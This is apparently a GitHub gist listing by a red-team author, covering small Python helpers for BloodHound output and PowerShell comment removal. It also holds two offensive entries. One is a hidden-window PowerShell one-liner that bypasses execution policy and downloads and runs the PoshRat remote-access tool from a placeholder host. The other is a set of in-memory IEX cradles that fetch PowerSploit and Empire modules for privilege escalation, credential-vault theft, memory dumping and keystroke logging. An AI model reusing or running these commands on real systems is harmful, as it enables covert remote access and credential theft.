bad-bit
/ JParser.py
Created
November 16, 2021 11:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| #Python script to filter "Enabled" machines from BloodHound's exported JSON output of the query "Find Computers with Unsupported Operating Systems". | |
| #Cuz I suck at Cypher query. | |
| import json | |
| import datetime | |
| import argparse | |
| def main(): |
bad-bit
/ remcom.py
Last active
November 9, 2021 12:32
An alternate for PowerSploit's Remove-Comment.ps1 which creates additional line breaks leading to additional modifications on the script or manual edits on the result file. This python script takes care of that and produces a clean, no comment PS script as an output of the given input file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Python 3.7 | |
| # An alternate for PowerSploit's Remove-Comment.ps1 which creates additional line breaks leading to additional modifications on the script or manual edits on the result file. | |
| # This python script takes care of that and produces a clean, no comment PS script as an output of the given input file. | |
| # Author - Vaibhav Choudhari @stackslash | |
| import re | |
| import argparse | |
| def main(): |
bad-bit
/ rem-com-ps.py
Last active
March 30, 2021 18:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Python 3.7 | |
| # An alternate for PowerSploit's Remove-Comment.ps1 which creates additional line breaks leading to additional modifications on the script or manual edits on the result file. | |
| # This python script takes care of that and produces a clean, no comment PS script as an output of the given input. | |
| # Author - Vaibhav Choudhari @_badbit_ (www.badbit.vc) | |
| # Todo: | |
| # Add arguement parsing | |
| import re | |
| import argparse |
bad-bit
/ gist:d5537e480c3fb42e96ca9c1e2a2cfd89
Created
October 18, 2020 20:21
One liner to download and execute PoshRat (Proxy aware)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c [Net.WebRequest]::DefaultWebProxy.Credentials = [Net.CredentialCache]::DefaultCredentials; IEX ((New-Object Net.WebClient).DownloadString('http://ip:port/connect')) |
bad-bit
/ aggregator.py
Created
January 21, 2020 19:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| def main(): | |
| path = "path" | |
| os.chdir(path) | |
| x = os.getcwd() | |
| print("Current working directory is: ", x) | |
| print("\n\n") |
bad-bit
/ Some more in-memory PS injections
Created
July 1, 2019 09:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1'); | |
| #IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Invoke-Inveigh.ps1') | |
| #"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1') | |
| #IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1'); Get-VaultCredential | |
| #IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') |